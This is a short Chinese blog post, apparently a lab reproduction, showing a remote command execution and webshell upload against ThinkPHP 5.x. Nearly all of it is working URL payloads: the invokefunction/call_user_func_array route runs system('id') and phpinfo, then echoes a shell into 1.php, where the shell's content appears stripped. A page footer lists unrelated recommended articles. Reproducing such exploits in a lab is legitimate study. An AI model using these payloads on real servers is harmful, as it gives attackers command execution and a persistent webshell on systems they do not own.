Thinkphp5x远程命令执⾏及getshell

2301_815255182024-09-24 12:11

启动环境查看端口

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=id ![](https://i-blog.csdnimg.cn/direct/71c2408fcf614719986569264e20893f.png) ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/3035c9bc75d545d387ac0b0359d85963.png) ? s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1

\]=echo "\" \>\>1.php ![](https://i-blog.csdnimg.cn/direct/10d4fe0c722944ceaa489763ceab5209.png) 访问1.php ![](https://i-blog.csdnimg.cn/direct/fc7472516e4840998cb786e1cf50fc8a.png)

相关推荐
lypzcgf5 小时前
Coze源码分析-资源库-编辑插件-后端源码-安全与错误处理
安全·插件·coze·coze源码分析·智能体平台·ai应用平台·agent平台
粟悟饭&龟波功6 小时前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙6 小时前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
安娜的信息安全说8 小时前
企业身份认证系统选型:Azure AD 与 Keycloak 功能详解
安全·microsoft·keycloak·azure ad
安当加密9 小时前
SLA操作系统双因素认证实现Windows远程桌面OTP双因子安全登录—从零搭建企业级RDP安全加固体系
windows·安全
你的人类朋友10 小时前
HTTP请求结合HMAC增加安全性
前端·后端·安全
Dest1ny-安全13 小时前
2025年,今后需要进步的方面
安全
BenSmith13 小时前
一次入门向v8漏洞复现
安全
ZHOU_WUYI14 小时前
构建AI安全防线:基于越狱检测的智能客服守护系统
人工智能·安全
萧鼎15 小时前
深入理解 Python `ssl` 库:安全通信的基石
python·安全·ssl
热门推荐
01GitHub 镜像站点02KGG转MP3工具|非KGM文件|解密音频03UV安装并设置国内源04OpenSpeedy简介05jdk21下载、安装(Windows、Linux、macOS)06在国行 macOS 下用 DeepSeek 补齐 Xcode 26 的 AI 能力:问题、原因与 mitmproxy 解决方案(含可用脚本与安装教程)07Linux下V2Ray安装配置指南08阿里最新开源Wan2.2-Animate-14B 本地部署教程:统一双模态框架,MoE架构赋能电影级角色动画与替换09VsCode远程Copilot无法使用Claude Agent问题10UV 工具安装与国内镜像源配置指南